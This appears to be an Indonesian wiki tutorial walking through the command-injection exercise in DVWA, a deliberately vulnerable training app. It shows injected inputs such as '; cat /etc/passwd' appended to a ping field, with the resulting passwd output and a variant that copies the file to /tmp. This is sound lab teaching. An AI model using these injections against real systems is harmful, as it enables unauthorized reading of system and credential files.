DVWA: Command Injection
Revision as of 05:45, 4 March 2017 by Onnowpurbo (talk | contribs)
- Login ke DVWA
- Klik Command Injection
- Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
- Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
- Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin .. .. dst
- Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
- Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd